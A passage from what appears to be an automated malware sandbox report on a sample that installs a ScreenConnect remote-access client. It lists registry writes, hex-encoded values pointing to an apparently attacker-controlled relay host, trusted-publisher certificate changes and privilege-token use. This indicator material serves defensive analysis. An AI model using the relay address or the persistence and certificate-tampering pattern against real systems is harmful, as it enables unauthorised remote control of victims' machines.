800690074006500630074007500720065003d006d00730069006c002c00200074007900700065003d00770069006e003300320022000d000a00540072007500730074006500640054006f00520075006e003d002200740072007500650022000d000a0050006500720073006900730074003d002200740072007500650022003e000d000a003c00440065006600610075006c0074004700720061006e0074003e000d000a003c0050006f006c00690063007900530074006100740065006d0065006e0074002000760065007200730069006f006e003d002200310022003e000d000a003c005000650072006d0069007300730069006f006e00530065007400200063006c006100730073003d002200530079007300740065006d002e00530065006300750072006900740079002e005000650072006d0069007300730069006f006e0053006500740022000d000a00760065007200730069006f006e003d002200310022000d000a00490044003d00220043007500730074006f006d0022000d000a00530061006d00650053006900740065003d002200730069007400650022000d000a0055006e0072006500730074007200690063007400650064003d002200740072007500650022000d000a0078006d006c006e0073003a00610073006d00760031003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a00610073006d002e007600310022000d000a0078006d006c006e0073003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a00610073006d002e007600320022000d000a0078006d006c006e0073003a00610073006d00760032003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a00610073006d002e007600320022000d000a0078006d006c006e0073003a007800730069003d00220068007400740070003a002f002f007700770077002e00770033002e006f00720067002f0032003000300031002f0058004d004c0053006300680065006d0061002d0069006e007300740061006e006300650022000d000a0078006d006c006e0073003a0063006f002e00760031003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a0063006c00690063006b006f006e00630065002e007600310022000d000a0078006d006c006e0073003a00610073006d00760033003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a00610073006d002e007600330022000d000a0078006d006c006e0073003a0064007300690067003d00220068007400740070003a002f002f007700770077002e00770033002e006f00720067002f0032003000300030002f00300039002f0078006d006c006400730069006700230022000d000a0078006d006c006e0073003a0063006f002e00760032003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a0063006c00690063006b006f006e00630065002e007600320022003e000d000a003c0049005000650072006d0069007300730069006f006e00200063006c006100730073003d002200530079007300740065006d002e004e00650074002e005700650062005000650072006d0069007300730069006f006e002c002000530079007300740065006d002c002000560065007200730069006f006e003d0032002e0030002e0030002e0030002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d00620037003700610035006300350036003100390033003400650030003800390022000d000a00760065007200730069006f006e003d002200310022003e000d000a003c0043006f006e006e006500630074004100630063006500730073003e000d000a003c0055005200490020007500720069003d00220028006800740074007000730029003a002f002f0074006500680069006800320038003700360038005c002e00730063007200650065006e0063006f006e006e006500630074005c002e0063006f006d002f002e002a0022002f003e000d000a003c002f0043006f006e006e006500630074004100630063006500730073003e000d000a003c002f0049005000650072006d0069007300730069006f006e003e000d000a003c002f005000650072006d0069007300730069006f006e005300650074003e000d000a003c002f0050006f006c00690063007900530074006100740065006d0065006e0074003e000d000a003c002f00440065006600610075006c0074004700720061006e0074003e000d000a003c004500780074007200610049006e0066006f00200044006100740061003d00220030003000300031003000300030003000300030004600460046004600460046004600460030003100300030003000300030003000300030003000300030003000300030003000430030003200300030003000300030003000350037003500330037003900370033003700340036003500360044003200450035003700360039003600450036003400360046003700370037003300320045003400360036004600370032003600440037003300320043003200300035003600360035003700320037003300360039003600460036004500330044003300340032004500330030003200450033003000320045003300300032004300320030003400330037003500360043003700340037003500370032003600350033004400360045003600350037003500370034003700320036003100360043003200430032003000350030003700350036003200360043003600390036003300340042003600350037003900350034003600460036004200360035003600450033004400360032003300370033003700360031003300350036003300330035003300360033003100330039003300330033003400360035003300300033003800330039003000350030003100300030003000300030003000330030003500330037003900370033003700340036003500360044003200450035003300360035003600330037003500370032003600390037003400370039003200450035003000360046003600430036003900360033003700390032004500340031003700300037003000360043003600390036003300360031003700340036003900360046003600450035003400370032003700350037003300370034003400350037003800370034003700320036003100340039003600450036003600360046003000310030003000300030003000300031003800370032003600350037003100370035003600350037003300370034003700330035003300360038003600350036004300360043003400390036004500370034003600350036003700370032003600310037003400360039003600460036004500300030003000310030003200300030003000300030003000300030003000420022002f003e000d000a003c002f004100700070006c00690063006100740069006f006e00540072007500730074003e000d000a000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0008_none_a9cdde1d1a468748\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32332e382e352e383730372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Visibility	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0008_3bd723dddab2064c\lock!1d0000003a61570ee00800008c0c00000000000000000000fbd57 = 30303030303865302c30316461356437316235366164316639	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0008_3bd723dddab2064c\appid = 68747470733a2f2f746568696832383736382e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e382e352e383730372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32332e382e352e383730372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0017.0008_none_65373fa8d61188bc\identity = 53637265656e436f6e6e6563742e436f72652c2056657273696f6e3d32332e382e352e383730372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0017.0008_3bd723dddab2064c	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0017.0008_none_69af178a125f9bec	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\NonCanonicalData	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0008_none_c67e18ccbef56bc9\Files	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0008_none_a9cdde1d1a468748\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32332e382e352e383730372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0008_none_168ad7f16bd0ec27\Transform = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0008_none_fb4c9d7ae560dec0\implication!scre..tion_25b0fbb6ef7eb094_0017.0008_db3 = 68747470733a2f2f746568696832383736382e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e382e352e383730372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0017.0008_none_69af178a125f9bec\lock!080000003a61570ee00800008c0c00000000000000000000 = 30303030303865302c30316461356437316235366164316639	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0008_none_fb4c9d7ae560dec0\lock!060000003a61570ee00800008c0c00000000000000000000 = 30303030303865302c30316461356437316235366164316639	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0008_none_a9cdde1d1a468748\SizeOfStronglyNamedComponent = c3fe020000000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0008_none_a9cdde1d1a468748\implication!scre..tion_25b0fbb6ef7eb094_0017.0008_db3 = 68747470733a2f2f746568696832383736382e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e382e352e383730372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0017.0008_none_65373fa8d61188bc\Files	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0017.0008_3bd723dddab2064c\PreparedForExecution = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0008_none_fb4c9d7ae560dec0	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0017.0008_none_168ad7f16bd0ec27\implication!scre..tion_25b0fbb6ef7eb094_0017.0008_db3 = 68747470733a2f2f746568696832383736382e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e382e352e383730372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0008_none_c67e18ccbef56bc9\lock!1a0000003a61570ee00800008c0c00000000000000000000 = 30303030303865302c30316461356437316235366164316639	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0008_none_c67e18ccbef56bc9	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0008_3bd723dddab2064c\scre..dows_4b14c015c87c1ad8_0017.0008_none_69af178a12 = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0008_none_c67e18ccbef56bc9\DigestMethod = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0017.0008_none_168ad7f16bd0ec27\lock!0c000000bd60570ec8040000a41100000000000000000000 = 30303030303463382c30316461356437316232663231616238	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0008_none_a9cdde1d1a468748	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0008_db378e17776f497e\scre...exe_25b0fbb6ef7eb094_0017.0008_none_a9cdde1d1a = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0008_none_4ac217b380c5512b\lock!020000003a61570ee00800008c0c00000000000000000000 = 30303030303865302c30316461356437316235366164316639	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb0 = 54007200750065000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb0 = 460061006c00730065000000	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0008_db378e17776f497e	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gi_scre..tion_25b0fbb6ef7eb094_9edfe039055229dd	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Installations	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0008_none_c67e18ccbef56bc9\Transform = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide	ScreenConnect.WindowsClient.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579	fd9c7a95284cee5e0145b8255e04a8af.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054	fd9c7a95284cee5e0145b8255e04a8af.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C	fd9c7a95284cee5e0145b8255e04a8af.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579	fd9c7a95284cee5e0145b8255e04a8af.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C	fd9c7a95284cee5e0145b8255e04a8af.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e	fd9c7a95284cee5e0145b8255e04a8af.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
2004	ScreenConnect.WindowsClient.exe
3236	ScreenConnect.WindowsClient.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4624	ScreenConnect.ClientService.exe
4624	ScreenConnect.ClientService.exe
4624	ScreenConnect.ClientService.exe
4624	ScreenConnect.ClientService.exe
4624	ScreenConnect.ClientService.exe
4624	ScreenConnect.ClientService.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1224	dfsvc.exe
Token: SeDebugPrivilege	4624	ScreenConnect.ClientService.exe

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
2004	ScreenConnect.WindowsClient.exe
2004	ScreenConnect.WindowsClient.exe
2004	ScreenConnect.WindowsClient.exe
2004	ScreenConnect.WindowsClient.exe
2004	ScreenConnect.WindowsClient.exe

Suspicious use of SendNotifyMessage 5 IoCs

pid	Process
2004	ScreenConnect.WindowsClient.exe
2004	ScreenConnect.WindowsClient.exe
2004	ScreenConnect.WindowsClient.exe
2004	ScreenConnect.WindowsClient.exe
2004	ScreenConnect.WindowsClient.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
